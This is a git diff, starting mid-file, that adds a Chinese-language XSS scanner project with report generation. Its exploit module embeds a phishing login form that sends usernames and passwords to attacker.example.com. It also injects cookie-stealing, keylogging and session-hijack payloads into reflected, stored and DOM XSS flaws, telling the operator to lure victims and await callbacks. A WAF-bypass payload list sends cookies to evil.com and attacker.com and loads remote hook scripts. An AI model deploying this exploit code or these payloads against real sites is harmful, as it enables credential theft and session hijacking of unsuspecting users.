+<p><input type="text" name="username" placeholder="用户名" style="width:100%;padding:10px;margin:10px 0;"></p>
+<p><input type="password" name="password" placeholder="密码" style="width:100%;padding:10px;margin:10px 0;"></p>
+<p><button type="submit" style="width:100%;padding:10px;background-color:#4CAF50;color:white;border:none;">登录</button></p>
+</form>
+<script>
+function sendCredentials(e) {{
+    e.preventDefault();
+    var u = document.querySelector('input[name="username"]').value;
+    var p = document.querySelector('input[name="password"]').value;
+    var xhr = new XMLHttpRequest();
+    xhr.open('GET', 'http://attacker.example.com/phish.php?u='+encodeURIComponent(u)+'&p='+encodeURIComponent(p)+'&id={self.exploit_id}', true);
+    xhr.onload = function() {{
+        window.location = '/login';
+    }};
+    xhr.send();
+}}
+</script>
+</div>"""
+    
+    def exploit(self, vulnerability):
+        """
+        利用XSS漏洞
+        
+        Args:
+            vulnerability: 漏洞信息
+            
+        Returns:
+            dict: 利用结果，如果利用失败则返回None
+        """
+        if vulnerability['type'] != 'XSS':
+            logger.warning(f"漏洞类型不匹配，预期XSS，实际为{vulnerability['type']}")
+            return None
+            
+        logger.info(f"尝试利用XSS漏洞: {vulnerability['url']}")
+        
+        # 根据漏洞子类型选择不同的利用方式
+        if vulnerability['subtype'] == 'Reflected XSS':
+            return self._exploit_reflected_xss(vulnerability)
+        elif vulnerability['subtype'] == 'Stored XSS':
+            return self._exploit_stored_xss(vulnerability)
+        elif vulnerability['subtype'] == 'DOM XSS':
+            return self._exploit_dom_xss(vulnerability)
+        else:
+            logger.warning(f"未知的XSS漏洞子类型: {vulnerability['subtype']}")
+            return None
+    
+    def _exploit_reflected_xss(self, vulnerability):
+        """
+        利用反射型XSS漏洞
+        
+        Args:
+            vulnerability: 漏洞信息
+            
+        Returns:
+            dict: 利用结果，如果利用失败则返回None
+        """
+        # 获取漏洞URL和参数
+        url = vulnerability['url']
+        parameter = vulnerability['parameter']
+        
+        # 构建利用载荷
+        payloads = [
+            self.cookie_steal_payload,
+            self.keylogger_payload,
+            self.session_hijack_payload,
+            self.phishing_payload
+        ]
+        
+        # 随机选择一个载荷进行利用
+        payload = random.choice(payloads)
+        
+        # 构建利用URL
+        parsed_url = urlparse(url)
+        query_params = dict(parse_qsl(parsed_url.query))
+        
+        if parameter in query_params:
+            query_params[parameter] = payload
+            
+            # 构建利用URL
+            exploit_url = f"{parsed_url.scheme}://{parsed_url.netloc}{parsed_url.path}?{urlencode(query_params)}"
+            
+            logger.info(f"生成XSS利用URL: {exploit_url}")
+            
+            return {
+                'type': 'XSS_EXPLOIT',
+                'exploit_type': '反射型XSS漏洞利用',
+                'url': exploit_url,
+                'payload': payload,
+                'description': f"反射型XSS漏洞利用成功，可以通过URL诱导用户访问触发XSS。",
+                'recommendation': "诱导用户访问该URL，然后等待回连数据。"
+            }
+        
+        return None
+    
+    def _exploit_stored_xss(self, vulnerability):
+        """
+        利用存储型XSS漏洞
+        
+        Args:
+            vulnerability: 漏洞信息
+            
+        Returns:
+            dict: 利用结果，如果利用失败则返回None
+        """
+        # 获取漏洞表单提交信息
+        url = vulnerability['url']
+        form_action = vulnerability.get('form_action', url)
+        form_method = vulnerability.get('form_method', 'POST')
+        parameter = vulnerability['parameter']
+        
+        # 构建利用载荷
+        payload = self.cookie_steal_payload
+        
+        # 构建表单数据
+        form_data = {
+            parameter: payload
+        }
+        
+        logger.info(f"尝试提交存储型XSS利用载荷到: {form_action}")
+        
+        # 提交表单
+        try:
+            if form_method.upper() == 'POST':
+                response = self.http_client.post(form_action, data=form_data)
+            else:
+                response = self.http_client.get(form_action, params=form_data)
+                
+            if response and response.status_code < 400:
+                return {
+                    'type': 'XSS_EXPLOIT',
+                    'exploit_type': '存储型XSS漏洞利用',
+                    'url': form_action,
+                    'payload': payload,
+                    'description': f"存储型XSS漏洞利用成功，XSS Payload已经注入到目标站点，将在用户访问时触发。",
+                    'recommendation': "等待用户访问包含存储型XSS的页面，然后接收回连数据。"
+                }
+        except Exception as e:
+            logger.error(f"利用存储型XSS漏洞时发生错误: {str(e)}")
+            
+        return None
+    
+    def _exploit_dom_xss(self, vulnerability):
+        """
+        利用DOM型XSS漏洞
+        
+        Args:
+            vulnerability: 漏洞信息
+            
+        Returns:
+            dict: 利用结果，如果利用失败则返回None
+        """
+        # DOM型XSS通常涉及到URL片段（hash）或特定参数
+        url = vulnerability['url']
+        parameter = vulnerability.get('parameter', 'fragment')
+        
+        # 构建利用载荷
+        payload = self.cookie_steal_payload
+        
+        # 如果是URL片段，直接添加到URL末尾
+        if parameter == 'fragment':
+            exploit_url = f"{url}#{payload}"
+        else:
+            # 否则作为URL参数
+            parsed_url = urlparse(url)
+            query_params = dict(parse_qsl(parsed_url.query))
+            query_params[parameter] = payload
+            exploit_url = f"{parsed_url.scheme}://{parsed_url.netloc}{parsed_url.path}?{urlencode(query_params)}"
+        
+        logger.info(f"生成DOM XSS利用URL: {exploit_url}")
+        
+        return {
+            'type': 'XSS_EXPLOIT',
+            'exploit_type': 'DOM型XSS漏洞利用',
+            'url': exploit_url,
+            'payload': payload,
+            'description': f"DOM型XSS漏洞利用成功，可以通过URL触发客户端XSS。",
+            'recommendation': "诱导用户访问该URL，然后等待回连数据。"
+        }
+    
+    def _generate_random_string(self, length=8):
+        """
+        生成随机字符串
+        
+        Args:
+            length: 字符串长度
+            
+        Returns:
+            str: 随机字符串
+        """
+        chars = string.ascii_letters + string.digits
+        return ''.join(random.choice(chars) for _ in range(length)) 
\ No newline at end of file
diff --git a/xss_scanner/main.py b/xss_scanner/main.py
new file mode 100644
index 0000000..2c66126
--- /dev/null
+++ b/xss_scanner/main.py
@@ -0,0 +1,135 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+
+"""
+XSS 深度漏洞扫描器
+作者: 高级渗透工程师
+版本: 1.0.0
+描述: 一个全面的XSS漏洞扫描工具，能够扫描多种平台的XSS漏洞，并提供其他漏洞的辅助扫描功能
+"""
+
+import sys
+import os
+import argparse
+import time
+import logging
+from datetime import datetime
+
+# 导入内部模块
+from xss_scanner.core.scanner_engine import ScannerEngine
+from xss_scanner.core.config import Config
+from xss_scanner.core.logger import setup_logger
+from xss_scanner.ui.cli import display_banner, display_progress, display_results
+from xss_scanner.utils.validator import validate_target
+
+def parse_arguments():
+    """解析命令行参数"""
+    parser = argparse.ArgumentParser(description='XSS 深度漏洞扫描器')
+    parser.add_argument('-u', '--url', help='目标URL')
+    parser.add_argument('-f', '--file', help='包含目标URL的文件')
+    parser.add_argument('-d', '--depth', type=int, default=2, help='爬虫深度 (默认: 2)')
+    parser.add_argument('-t', '--threads', type=int, default=5, help='线程数 (默认: 5)')
+    parser.add_argument('--timeout', type=int, default=10, help='请求超时时间，单位秒 (默认: 10)')
+    parser.add_argument('--user-agent', help='自定义User-Agent')
+    parser.add_argument('--cookie', help='请求Cookie')
+    parser.add_argument('--headers', help='自定义HTTP头，格式: "Header1:Value1;Header2:Value2"')
+    parser.add_argument('--proxy', help='HTTP代理，格式: http://user:pass@host:port')
+    parser.add_argument('--scan-level', type=int, choices=[1, 2, 3], default=2, 
+                        help='扫描级别: 1-快速, 2-标准, 3-深度 (默认: 2)')
+    parser.add_argument('--scan-type', choices=['all', 'xss', 'csrf', 'sqli', 'lfi', 'rfi', 'ssrf', 'xxe'], 
+                        default='all', help='扫描类型 (默认: all)')
+    parser.add_argument('--payload-level', type=int, choices=[1, 2, 3], default=2,
+                        help='Payload复杂度: 1-基础, 2-标准, 3-高级 (默认: 2)')
+    parser.add_argument('-o', '--output', help='输出报告文件路径')
+    parser.add_argument('--format', choices=['txt', 'html', 'json', 'xml'], default='html',
+                        help='报告输出格式 (默认: html)')
+    parser.add_argument('-v', '--verbose', action='store_true', help='显示详细输出')
+    parser.add_argument('--no-color', action='store_true', help='禁用彩色输出')
+    
+    # 高级选项
+    advanced_group = parser.add_argument_group('高级选项')
+    advanced_group.add_argument('--browser', action='store_true', help='使用真实浏览器进行扫描')
+    advanced_group.add_argument('--exploit', action='store_true', help='尝试利用发现的漏洞')
+    advanced_group.add_argument('--custom-payloads', help='自定义Payload文件路径')
+    advanced_group.add_argument('--exclude', help='排除URL模式 (正则表达式)')
+    advanced_group.add_argument('--include', help='仅包含URL模式 (正则表达式)')
+    advanced_group.add_argument('--auth', help='基本认证，格式: username:password')
+    
+    return parser.parse_args()
+
+def main():
+    """主函数"""
+    # 显示Banner
+    display_banner()
+    
+    # 解析命令行参数
+    args = parse_arguments()
+    
+    # 配置日志
+    log_level = logging.DEBUG if args.verbose else logging.INFO
+    logger = setup_logger(log_level, args.no_color)
+    
+    # 配置扫描器
+    config = Config()
+    config.load_from_args(args)
+    
+    # 验证目标
+    targets = []
+    if args.url:
+        if validate_target(args.url):
+            targets.append(args.url)
+        else:
+            logger.error(f"无效的目标URL: {args.url}")
+            sys.exit(1)
+    elif args.file:
+        if not os.path.exists(args.file):
+            logger.error(f"文件不存在: {args.file}")
+            sys.exit(1)
+        with open(args.file, 'r') as f:
+            for line in f:
+                url = line.strip()
+                if validate_target(url):
+                    targets.append(url)
+    else:
+        logger.error("必须指定目标URL(-u)或包含目标的文件(-f)")
+        sys.exit(1)
+    
+    if not targets:
+        logger.error("没有有效的目标")
+        sys.exit(1)
+    
+    # 初始化扫描引擎
+    scanner = ScannerEngine(config)
+    
+    # 开始扫描
+    start_time = time.time()
+    logger.info(f"扫描开始，目标数量: {len(targets)}")
+    
+    results = []
+    for target in targets:
+        logger.info(f"正在扫描: {target}")
+        result = scanner.scan(target)
+        results.append(result)
+        
+    total_time = time.time() - start_time
+    
+    # 显示结果
+    display_results(results, total_time)
+    
+    # 生成报告
+    if args.output:
+        from xss_scanner.reporters.report_generator import generate_report
+        generate_report(results, args.output, args.format)
+        logger.info(f"报告已保存至: {args.output}")
+    
+    logger.info(f"扫描完成，总耗时: {total_time:.2f}秒")
+
+if __name__ == "__main__":
+    try:
+        main()
+    except KeyboardInterrupt:
+        print("\n用户中断，扫描已停止")
+        sys.exit(0)
+    except Exception as e:
+        print(f"发生错误: {str(e)}")
+        sys.exit(1) 
\ No newline at end of file
diff --git a/xss_scanner/payloads/xss/xss_level1.txt b/xss_scanner/payloads/xss/xss_level1.txt
new file mode 100644
index 0000000..ae0feee
--- /dev/null
+++ b/xss_scanner/payloads/xss/xss_level1.txt
@@ -0,0 +1,15 @@
+<script>alert('XSS')</script>
+<img src=x onerror=alert('XSS')>
+<svg onload=alert('XSS')>
+<body onload=alert('XSS')>
+<iframe onload=alert('XSS')></iframe>
+javascript:alert('XSS')
+<input autofocus onfocus=alert('XSS')>
+<select autofocus onfocus=alert('XSS')>
+<textarea autofocus onfocus=alert('XSS')>
+<keygen autofocus onfocus=alert('XSS')>
+<video><source onerror=alert('XSS')>
+<audio src=x onerror=alert('XSS')>
+"><script>alert('XSS')</script>
+'><script>alert('XSS')</script>
+><img src=x onerror=alert('XSS')> 
\ No newline at end of file
diff --git a/xss_scanner/payloads/xss/xss_waf_bypass.txt b/xss_scanner/payloads/xss/xss_waf_bypass.txt
new file mode 100644
index 0000000..c2c1043
--- /dev/null
+++ b/xss_scanner/payloads/xss/xss_waf_bypass.txt
@@ -0,0 +1,69 @@
+# Cloudflare绕过
+<ScrIpT>prompt(1)</sCrIpT>
+<a/onmouseover=prompt(1)>XSS
+<a/href="j&#97v&#97script&#x3A;&#97lert(1)">XSS
+<svg/onload=confirm(String.fromCharCode(88,83,83))>
+<img/src="x"/onerror=document['cookie'];eval(atob('YWxlcnQoImNvb2tpZSBzdGVhbGVyIik7'));>
+<body/onwheel="[1].find(alert)">Roll ME
+<svg onload=setInterval`alert\u0028document.domain\u0029`>
+<x/onclick=document.location='http://xss.rocks/xss.js'>click me
+
+# ModSecurity绕过
+<details/open/ontoggle="alert`1`">XSS
+<a69/onclick=[1].map(alert)>XSS
+<IfRaMe/src=javascript:alert(1)>
+<l/onclick="[''].findIndex(alert)">l
+<%78%63%72%69%70%74>a=prompt;a(1);</%78%63%72%69%70%74>
+<img src=1 onerror="a=alert;a(1)">
+<img src=1 o&#x6e;error="javascript&colon;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;1&#x29;">
+
+# Imperva绕过
+<iframe/onload='this["src"]="javas&Tab;cript:document["locati&Tab;on"]["replace"]("https://evil.com/"+document["cookie"]);'>
+<img src=x:prompt(eval(atob('ZG9jdW1lbnQuY29va2ll')))>
+<dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x>
+<scrIPT x=">" SRC="https://attacker.com/xss.js"></scrIPT>
+<d3"<"/onclick="1>[confirm``]"<">d3
+
+# F5 BIG-IP绕过
+<noscript><p title="</noscript><img src=x onerror=alert(1)>">
+<a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1)&NewLine;>XSS
+<input type="text" value="> " onkeydown="prompt(1)" autofocus ">
+<form><button formaction=javascript&colon;alert(1)>XSS
+<img/src='x'%0Aonerror=confirm`1`>
+
+# Akamai绕过
+<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">XSS</a>
+<iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>
+<img src=``&NewLine; onerror=alert(1)&NewLine;``>
+<script>~'<script>'/**/;alert(1)//'</script>
+<style><script>a@import'//XSS.rocks'</script></style>
+
+# 通用WAF绕过
+<svg><animate onbegin=confirm() attributeName=x></svg>
+<script>$=1,$$='ale',$$$='rt',$$$$=`(1)`,eval($$+$$$+$$$$)</script>
+<details ontoggle=eval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=='))>
+<img src=x onerror=\u0065\u0076\u0061\u006c('\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0029')>
+<body onpageshow=top['ale'+'rt']('1')>
+<body onpageshow=function(){eval(String.fromCodePoint(97,108,101,114,116,40,49,41))}>
+<math><xss href="javascript:alert(1)">XSS
+<a href="j&X41vascript&colon;alert&lpar;1&rpar;">XSS
+<button autofocus onfocus=top[11000000..toString(36)[0]+628..toString(36)[1]+'ert'](1)></button>
+<img/src="x"/onerror=top['\141\154\145\162\164'](1)>
+<svg><script>+(x=>document[`body`].appendChild(document[`createElement`](`img`)).src=`https://attacker.com/c/`+document[`cookie`])()</script>
+<a href=javascript:alert(1)>XSS
+<img src="x" onerror="window&#46;document&#46;location = '//attacker.com/' + document&#46;cookie;">
+<iframe srcdoc="<a href='javascript:alert(1)'>XSS</a>"></iframe>
+
+# 混淆和编码组合
+<img src=x onerror="Function(String.fromCharCode(97,108,101,114,116,40,39,88,83,83,39,41))()">
+<body><template><s id=x onclick=alert()>XSS</s></template></body>
+<img src=x onerror=eval('\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0029')>
+<A HREF="h&#x74t&#x70&#x3a&#x2f&#x2f&#x67o&#x6f&#x67&#x6c&#x65&#x2e&#x63&#x6f&#x6d">XSS</A>
+<body><textarea onkeyup='javascript:"\x3c\x73\x63\x72\x69\x70\x74\x3e\x61\x6c\x65\x72\x74\x28\x31\x29\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e"'></textarea>
+<img%09onerror=alert(1) src=a>
+<i onclick=c&#39;onfirm(1)>click me</i>
+<div id="x">x</div><script>Object.prototype.BUMMER=1;document.getElementById('x').innerHTML='XSS'</script>
+<iframe src="javascript:(function(){var s=document.createElement('script');s.src='//attacker.com/hook.js';document.body.appendChild(s)})()"></iframe>
+<input autofocus onfocus="document.body.appendChild(document.createElement`img`).src='https://attacker.com/c/'+document.cookie">
+<math><mtext><option><FAKEELEMENT><math><option><annotation-xml encoding="text/html"><img src=x onerror=alert(1)><annotation-xml>
+<div id="div1"><input value="``onmouseover=alert(1)"></div><div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script> 
\ No newline at end of file
diff --git a/xss_scanner/reporters/__init__.py b/xss_scanner/reporters/__init__.py
new file mode 100644
index 0000000..1915fcf
--- /dev/null
+++ b/xss_scanner/reporters/__init__.py
@@ -0,0 +1 @@
+"""XSS扫描器 - 报告生成模块""" 
\ No newline at end of file
diff --git a/xss_scanner/reporters/report_generator.py b/xss_scanner/reporters/report_generator.py
new file mode 100644
index 0000000..0273027
--- /dev/null
+++ b/xss_scanner/reporters/report_generator.py
@@ -0,0 +1,546 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+
+"""
+报告生成器模块，负责生成扫描结果报告
+"""
+
+import os
+import json
+import logging
+import html
+import datetime
+from xml.dom.minidom import getDOMImplementation
+
+logger = logging.getLogger('xss_scanner')
+
+def generate_report(results, output_file, format_type='html'):
+    """
+    生成扫描报告
+    
+    Args:
+        results: 扫描结果列表
+        output_file: 输出文件路径
+        format_type: 报告格式 (html, json, xml, txt)
+    
+    Returns:
+        bool: 是否成功生成报告
+    """
+    # 创建输出目录（如果不存在）
+    output_dir = os.path.dirname(output_file)
+    if output_dir and not os.path.exists(output_dir):
+        os.makedirs(output_dir)
+    
+    try:
+        if format_type == 'html':
+            return generate_html_report(results, output_file)
+        elif format_type == 'json':
+            return generate_json_report(results, output_file)
+        elif format_type == 'xml':
+            return generate_xml_report(results, output_file)
+        elif format_type == 'txt':
+            return generate_txt_report(results, output_file)
+        else:
+            logger.error(f"不支持的报告格式: {format_type}")
+            return False
+    except Exception as e:
+        logger.error(f"生成报告时发生错误: {str(e)}")
+        return False
+
+def generate_html_report(results, output_file):
+    """
+    生成HTML格式的报告
+    
+    Args:
+        results: 扫描结果列表
+        output_file: 输出文件路径
+    
+    Returns:
+        bool: 是否成功生成报告
+    """
+    # 合并所有结果的统计信息
+    total_stats = {
+        'pages_scanned': 0,
+        'forms_tested': 0,
+        'parameters_tested': 0,
+        'vulnerabilities_found': 0
+    }
+    
+    all_vulnerabilities = []
+    targets = []
+    start_time = None
+    total_time = 0
+    
+    for result in results:
+        targets.append(result['target'])
+        
+        # 更新统计信息
+        for key in total_stats:
+            if key in result['statistics']:
+                total_stats[key] += result['statistics'][key]
+        
+        # 收集所有漏洞
+        all_vulnerabilities.extend(result['vulnerabilities'])
+        
+        # 计算总扫描时间
+        if result.get('start_time') and result.get('end_time'):
+            total_time += (result['end_time'] - result['start_time'])
+        
+        # 记录最早的开始时间
+        if start_time is None or (result.get('start_time') and result['start_time'] < start_time):
+            start_time = result.get('start_time')
+    
+    # 按漏洞类型分组
+    vuln_by_type = {}
+    for vuln in all_vulnerabilities:
+        vuln_type = vuln['type']
+        if vuln_type not in vuln_by_type:
+            vuln_by_type[vuln_type] = []
+        vuln_by_type[vuln_type].append(vuln)
+    
+    # 生成HTML报告
+    html_content = f"""<!DOCTYPE html>
+<html lang="zh-CN">
+<head>
+    <meta charset="UTF-8">
+    <meta name="viewport" content="width=device-width, initial-scale=1.0">
+    <title>XSS深度漏洞扫描报告</title>
+    <style>
+        body {{
+            font-family: "Segoe UI", Arial, sans-serif;
+            line-height: 1.6;
+            color: #333;
+            max-width: 1200px;
+            margin: 0 auto;
+            padding: 20px;
+            background-color: #f9f9f9;
+        }}
+        .container {{
+            background-color: #fff;
+            border-radius: 8px;
+            box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
+            padding: 20px;
+            margin-bottom: 30px;
+        }}
+        h1, h2, h3, h4 {{
+            color: #2c3e50;
+            margin-top: 20px;
+        }}
+        h1 {{
+            text-align: center;
+            color: #3498db;
+            border-bottom: 2px solid #3498db;
+            padding-bottom: 10px;
+            margin-bottom: 30px;
+        }}
+        .header-info {{
+            display: flex;
+            justify-content: space-between;
+            flex-wrap: wrap;
+        }}
+        .header-info div {{
+            flex: 1;
+            min-width: 250px;
+            margin: 10px;
+        }}
+        table {{
+            width: 100%;
+            border-collapse: collapse;
+            margin: 20px 0;
+        }}
+        th, td {{
+            border: 1px solid #ddd;
+            padding: 12px;
+            text-align: left;
+        }}
+        th {{
+            background-color: #f2f2f2;
+            font-weight: bold;
+        }}
+        tr:nth-child(even) {{
+            background-color: #f9f9f9;
+        }}
+        .severity-high {{
+            color: #e74c3c;
+            font-weight: bold;
+        }}
+        .severity-medium {{
+            color: #f39c12;
+            font-weight: bold;
+        }}
+        .severity-low {{
+            color: #3498db;
+            font-weight: bold;
+        }}
+        .stats-container {{
+            display: flex;
+            flex-wrap: wrap;
+            justify-content: space-between;
+            margin-bottom: 20px;
+        }}
+        .stat-box {{
+            flex: 1;
+            min-width: 200px;
+            background-color: #fff;
+            border-radius: 8px;
+            box-shadow: 0 0 5px rgba(0, 0, 0, 0.1);
+            padding: 15px;
+            margin: 10px;
+            text-align: center;
+        }}
+        .stat-value {{
+            font-size: 24px;
+            font-weight: bold;
+            color: #3498db;
+            margin: 10px 0;
+        }}
+        .stat-label {{
+            font-size: 14px;
+            color: #7f8c8d;
+        }}
+        .vuln-details {{
+            background-color: #f8f9fa;
+            border-left: 4px solid #3498db;
+            padding: 12px;
+            margin: 10px 0;
+            border-radius: 0 4px 4px 0;
+        }}
+        .no-vulns {{
+            text-align: center;
+            color: #27ae60;
+            font-size: 18px;
+            padding: 20px;
+            background-color: #e8f8f5;
+            border-radius: 5px;
+            margin: 20px 0;
+        }}
+        .footer {{
+            text-align: center;
+            margin-top: 30px;
+            padding-top: 20px;
+            border-top: 1px solid #eee;
+            color: #7f8c8d;
+        }}
+    </style>
+</head>
+<body>
+    <div class="container">
+        <h1>XSS深度漏洞扫描报告</h1>
+        
+        <div class="header-info">
+            <div>
+                <h3>扫描信息</h3>
+                <strong>目标网站：</strong> {', '.join(targets)}
+                <strong>扫描时间：</strong> {datetime.datetime.fromtimestamp(start_time).strftime('%Y-%m-%d %H:%M:%S') if start_time else 'N/A'}
+                <strong>总耗时：</strong> {total_time:.2f}秒
+            </div>
+            <div>
+                <h3>扫描范围</h3>
+                <strong>扫描页面：</strong> {total_stats['pages_scanned']}
+                <strong>测试表单：</strong> {total_stats['forms_tested']}
+                <strong>测试参数：</strong> {total_stats['parameters_tested']}
+            </div>
+        </div>
+        
+        <div class="stats-container">
+            <div class="stat-box">
+                <div class="stat-label">发现漏洞</div>
+                <div class="stat-value">{total_stats['vulnerabilities_found']}</div>
+            </div>
+            <div class="stat-box">
+                <div class="stat-label">页面扫描</div>
+                <div class="stat-value">{total_stats['pages_scanned']}</div>
+            </div>
+            <div class="stat-box">
+                <div class="stat-label">表单测试</div>
+                <div class="stat-value">{total_stats['forms_tested']}</div>
+            </div>
+            <div class="stat-box">
+                <div class="stat-label">参数测试</div>
+                <div class="stat-value">{total_stats['parameters_tested']}</div>
+            </div>
+        </div>
+    </div>
+
+    <div class="container">
+        <h2>漏洞详情</h2>
+"""
+    
+    if all_vulnerabilities:
+        for vuln_type, vulns in vuln_by_type.items():
+            html_content += f"""
+        <h3>{vuln_type} 漏洞 ({len(vulns)})</h3>
+        <table>
+            <tr>
+                <th>#</th>
+                <th>URL</th>
+                <th>参数</th>
+                <th>漏洞级别</th>
+                <th>描述</th>
+            </tr>
+"""
+            
+            for i, vuln in enumerate(vulns, 1):
+                severity_class = ""
+                if vuln.get('severity') == '高':
+                    severity_class = "severity-high"
+                elif vuln.get('severity') == '中':
+                    severity_class = "severity-medium"
+                else:
+                    severity_class = "severity-low"
+                    
+                html_content += f"""
+            <tr>
+                <td>{i}</td>
+                <td>{html.escape(vuln.get('url', ''))}</td>
+                <td>{html.escape(vuln.get('parameter', ''))}</td>
+                <td class="{severity_class}">{html.escape(vuln.get('severity', ''))}</td>
+                <td>{html.escape(vuln.get('description', ''))}</td>
+            </tr>
+            <tr>
+                <td colspan="5">
+                    <div class="vuln-details">
+                        <strong>详情：</strong> {html.escape(vuln.get('details', ''))}
+                        <strong>Payload：</strong> {html.escape(vuln.get('payload', ''))}
+                        <strong>修复建议：</strong> {html.escape(vuln.get('recommendation', ''))}
+                    </div>
+                </td>
+            </tr>
+"""
+            
+            html_content += """
+        </table>
+"""
+    else:
+        html_content += """
+        <div class="no-vulns">
+            恭喜！未发现任何漏洞。
+        </div>
+"""
+    
+    html_content += """
+    </div>
+    
+    <div class="footer">
+        扫描报告生成时间：""" + datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S') + """
+        XSS深度漏洞扫描器 v1.0.0
+    </div>
+</body>
+</html>
+"""
+    
+    # 写入文件
+    with open(output_file, 'w', encoding='utf-8') as f:
+        f.write(html_content)
+    
+    return True
+
+def generate_json_report(results, output_file):
+    """
+    生成JSON格式的报告
+    
+    Args:
+        results: 扫描结果列表
+        output_file: 输出文件路径
+    
+    Returns:
+        bool: 是否成功生成报告
+    """
+    # 添加报告生成时间
+    report = {
+        'report_time': datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S'),
+        'results': results
+    }
+    
+    # 写入文件
+    with open(output_file, 'w', encoding='utf-8') as f:
+        json.dump(report, f, indent=2, ensure_ascii=False)
+    
+    return True
+
+def generate_xml_report(results, output_file):
+    """
+    生成XML格式的报告
+    
+    Args:
+        results: 扫描结果列表
+        output_file: 输出文件路径
+    
+    Returns:
+        bool: 是否成功生成报告
+    """
+    impl = getDOMImplementation()
+    
+    # 创建文档和根元素
+    doc = impl.createDocument(None, "xss_scanner_report", None)
+    root = doc.documentElement
+    
+    # 添加报告生成时间
+    report_time = doc.createElement("report_time")
+    report_time.appendChild(doc.createTextNode(datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')))
+    root.appendChild(report_time)
+    
+    # 添加结果
+    results_elem = doc.createElement("results")
+    root.appendChild(results_elem)
+    
+    for result in results:
+        result_elem = doc.createElement("result")
+        results_elem.appendChild(result_elem)
+        
+        # 添加目标
+        target_elem = doc.createElement("target")
+        target_elem.appendChild(doc.createTextNode(result.get('target', '')))
+        result_elem.appendChild(target_elem)
+        
+        # 添加扫描信息
+        if 'scan_info' in result:
+            scan_info_elem = doc.createElement("scan_info")
+            result_elem.appendChild(scan_info_elem)
+            
+            for key, value in result['scan_info'].items():
+                elem = doc.createElement(key)
+                elem.appendChild(doc.createTextNode(str(value)))
+                scan_info_elem.appendChild(elem)
+        
+        # 添加统计信息
+        if 'statistics' in result:
+            stats_elem = doc.createElement("statistics")
+            result_elem.appendChild(stats_elem)
+            
+            for key, value in result['statistics'].items():
+                elem = doc.createElement(key)
+                elem.appendChild(doc.createTextNode(str(value)))
+                stats_elem.appendChild(elem)
+        
+        # 添加漏洞
+        if 'vulnerabilities' in result:
+            vulns_elem = doc.createElement("vulnerabilities")
+            result_elem.appendChild(vulns_elem)
+            
+            for vuln in result['vulnerabilities']:
+                vuln_elem = doc.createElement("vulnerability")
+                vulns_elem.appendChild(vuln_elem)
+                
+                for key, value in vuln.items():
+                    elem = doc.createElement(key)
+                    elem.appendChild(doc.createTextNode(str(value)))
+                    vuln_elem.appendChild(elem)
+    
+    # 写入文件
+    with open(output_file, 'w', encoding='utf-8') as f:
+        f.write(doc.toprettyxml(indent="  "))
+    
+    return True
+
+def generate_txt_report(results, output_file):
+    """
+    生成TXT格式的报告
+    
+    Args:
+        results: 扫描结果列表
+        output_file: 输出文件路径
+    
+    Returns:
+        bool: 是否成功生成报告
+    """
+    # 合并所有结果的统计信息
+    total_stats = {
+        'pages_scanned': 0,
+        'forms_tested': 0,
+        'parameters_tested': 0,
+        'vulnerabilities_found': 0
+    }
+    
+    all_vulnerabilities = []
+    targets = []
+    start_time = None
+    total_time = 0
+    
+    for result in results:
+        targets.append(result['target'])
+        
+        # 更新统计信息
+        for key in total_stats:
+            if key in result['statistics']:
+                total_stats[key] += result['statistics'][key]
+        
+        # 收集所有漏洞
+        all_vulnerabilities.extend(result['vulnerabilities'])
+        
+        # 计算总扫描时间
+        if result.get('start_time') and result.get('end_time'):
+            total_time += (result['end_time'] - result['start_time'])
+        
+        # 记录最早的开始时间
+        if start_time is None or (result.get('start_time') and result['start_time'] < start_time):
+            start_time = result.get('start_time')
+    
+    # 按漏洞类型分组
+    vuln_by_type = {}
+    for vuln in all_vulnerabilities:
+        vuln_type = vuln['type']
+        if vuln_type not in vuln_by_type:
+            vuln_by_type[vuln_type] = []
+        vuln_by_type[vuln_type].append(vuln)
+    
+    # 生成TXT报告
+    txt_content = f"""
+==========================================
+       XSS深度漏洞扫描报告
+==========================================
+
+扫描信息
+------------------------------------------
+目标网站：{', '.join(targets)}
+扫描时间：{datetime.datetime.fromtimestamp(start_time).strftime('%Y-%m-%d %H:%M:%S') if start_time else 'N/A'}
+总耗时：{total_time:.2f}秒
+
+扫描统计
+------------------------------------------
+发现漏洞：{total_stats['vulnerabilities_found']}
+扫描页面：{total_stats['pages_scanned']}
+测试表单：{total_stats['forms_tested']}
+测试参数：{total_stats['parameters_tested']}
+
+漏洞详情
+==========================================
+"""
+    
+    if all_vulnerabilities:
+        for vuln_type, vulns in vuln_by_type.items():
+            txt_content += f"""
+{vuln_type} 漏洞 ({len(vulns)})
+------------------------------------------
+"""
+            
+            for i, vuln in enumerate(vulns, 1):
+                txt_content += f"""
+#{i}
+URL: {vuln.get('url', '')}
+参数: {vuln.get('parameter', '')}
+漏洞级别: {vuln.get('severity', '')}
+描述: {vuln.get('description', '')}
+详情: {vuln.get('details', '')}
+Payload: {vuln.get('payload', '')}
+修复建议: {vuln.get('recommendation', '')}
+
+"""
+    else:
+        txt_content += """
+恭喜！未发现任何漏洞。
+
+"""
+    
+    txt_content += f"""
+==========================================
+报告生成时间：{datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')}
+XSS深度漏洞扫描器 v1.0.0
+==========================================
+"""
+    
+    # 写入文件
+    with open(output_file, 'w', encoding='utf-8') as f:
+        f.write(txt_content)
+    
+    return True 
\ No newline at end of file
diff --git a/xss_scanner/requirements.txt b/xss_scanner/requirements.txt
new file mode 100644
